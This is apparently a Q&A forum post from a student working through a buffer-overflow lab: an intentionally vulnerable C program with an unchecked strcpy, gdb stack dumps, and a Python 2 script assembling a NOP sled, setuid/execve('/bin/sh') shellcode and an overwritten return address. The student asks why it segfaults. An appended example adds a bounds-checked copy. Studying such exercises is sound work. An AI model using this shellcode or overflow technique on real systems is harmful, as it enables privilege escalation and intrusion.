I'm following this tutorial: https://samsclass.info/127/proj/lbuf1.htm
I have ASLR off and I'm using Python 2, btw.
C code:
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char buffer[100];
strcpy(buffer, argv[1]);
printf("Done\n");
}
Compiled with: gcc -m32 -g -fno-stack-protector -z execstack -o buffer buffer.c
Then I run it in gdb and add a breakpoint at line 8 (printf("Done\n");), then I type run A and then info registers:
eax 0xffffd56c -10900
ecx 0xffffd896 -10090
edx 0xffffd56c -10900
ebx 0x56558fd4 1448447956
esp 0xffffd560 0xffffd560
ebp 0xffffd5d8 0xffffd5d8
esi 0xf7fa9000 -134574080
edi 0xf7fa9000 -134574080
eip 0x56556228 0x56556228 <main+59>
eflags 0x286 [ PF SF IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
Then x/40x $esp:
0xffffd560: 0x00000000 0x00c30000 0x00000001 0xf7ff0041 #Here's A
0xffffd570: 0x00000000 0x00000000 0x00005034 0xc725d900
0xffffd580: 0x029c6fbf 0x00000534 0x0000005e 0xf7fa7a80
0xffffd590: 0x00000000 0xf7fa9000 0xf7ffc7e0 0xf7facc68
0xffffd5a0: 0xf7fa9000 0xf7fe22f0 0x00000000 0xf7df6402
0xffffd5b0: 0xf7fa93fc 0x00000001 0x56558fd4 0x565562a3
0xffffd5c0: 0x00000002 0xffffd684 0xffffd690 0x56556271
0xffffd5d0: 0xffffd5f0 0x00000000 0x00000000 0xf7ddcee5
0xffffd5e0: 0xf7fa9000 0xf7fa9000 0x00000000 0xf7ddcee5
0xffffd5f0: 0x00000002 0xffffd684 0xffffd690 0xffffd614
I commented the line where A is seen. Since it works, I make this Python script:
#!/usr/bin/python2
nopsled = '\x90' * 64
shellcode = (
'\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2' +
'\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89' +
'\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80'
)
padding = '\x41' * (112 - 64 - 32)
eip = '\x10\xd5\xff\xff' #0xffffd510 is where the nop sled will be
print nopsled + shellcode + padding + eip
Then I run ./nsled > t_nsled, and it works, so I get back into gdb, add a breakpoint at line 8 and then run: run $(cat t_nsled)
Here is what I get:
Breakpoint 1, main (argc=<error reading variable: Cannot access memory at address 0x41414141>, argv=<error reading variable: Cannot access memory at address 0x41414145>) at buffer.c:8
8 printf("Done\n");
Then info registers, and here is what x/40x $esp outputs:
0xffffd4f0: 0x00000000 0x00c30000 0x00000001 0x90909090
0xffffd500: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd510: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd520: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd530: 0x90909090 0x90909090 0x90909090 0xc389c031
0xffffd540: 0x80cd17b0 0x6852d231 0x68732f6e 0x622f2f68
0xffffd550: 0x52e38969 0x8de18953 0x80cd0b42 0x41414141
0xffffd560: 0x41414141 0x41414141 0x41414141 0xffffd510 #Return address to nopsled
0xffffd570: 0xf7fa9000 0xf7fa9000 0x00000000 0xf7ddcee5
0xffffd580: 0x00000002 0xffffd614 0xffffd620 0xffffd5a4
Then I type continue and get this:
Continuing.
Done
Program received signal SIGSEGV, Segmentation fault.
0x56556248 in main (argc=<error reading variable: Cannot access memory at address 0x41414141>, argv=<error reading variable: Cannot access memory at address 0x41414145>) at buffer.c:9
9 }
Why isn't the shellcode executed, and why are those errors there? Even if I run it in the actual shell, not in gdb, I still just get a segmentation fault. Why?
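For reference, the root defect in the program above is the unchecked strcpy of argv[1] into a 100-byte buffer. The following is an added example, not code from the question or the tutorial: the same program with the copy replaced by a bounds-checked helper (hypothetical name copy_arg) that rejects any argument that does not fit, plus a constructed oversize input so the check can be exercised without a crash.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the question. The question's main() does
 * strcpy(buffer, argv[1]) with no length check, so any argument longer
 * than 99 bytes runs past `buffer` into the saved frame data above it.
 * copy_arg() (hypothetical name) refuses such input instead of writing
 * past the end. Returns 0 on success, -1 if the source does not fit. */
int copy_arg(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (dst_size == 0 || len >= dst_size)   /* keep room for the NUL */
        return -1;
    memcpy(dst, src, len + 1);              /* copies the terminator too */
    return 0;
}

/* Demo helper: builds a constructed argument of n 'A' bytes, the same
 * filler byte the question's script uses for padding. */
static char long_arg[256];
const char *make_arg(size_t n)
{
    if (n >= sizeof long_arg)
        n = sizeof long_arg - 1;
    memset(long_arg, 'A', n);
    long_arg[n] = '\0';
    return long_arg;
}

int main(int argc, char **argv)
{
    char buffer[100];                       /* same size as in the question */
    const char *arg = argc > 1 ? argv[1] : make_arg(116);

    if (copy_arg(buffer, sizeof buffer, arg) != 0) {
        fprintf(stderr, "argument too long (%zu bytes, max %zu)\n",
                strlen(arg), sizeof buffer - 1);
        return 1;                           /* refuse instead of overflowing */
    }
    printf("Done\n");
    return 0;
}
```

Run with no argument it uses the constructed 116-byte input (the length the question's script produces) and exits with the error message instead of a segmentation fault.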
User contributions licensed under CC BY-SA 3.0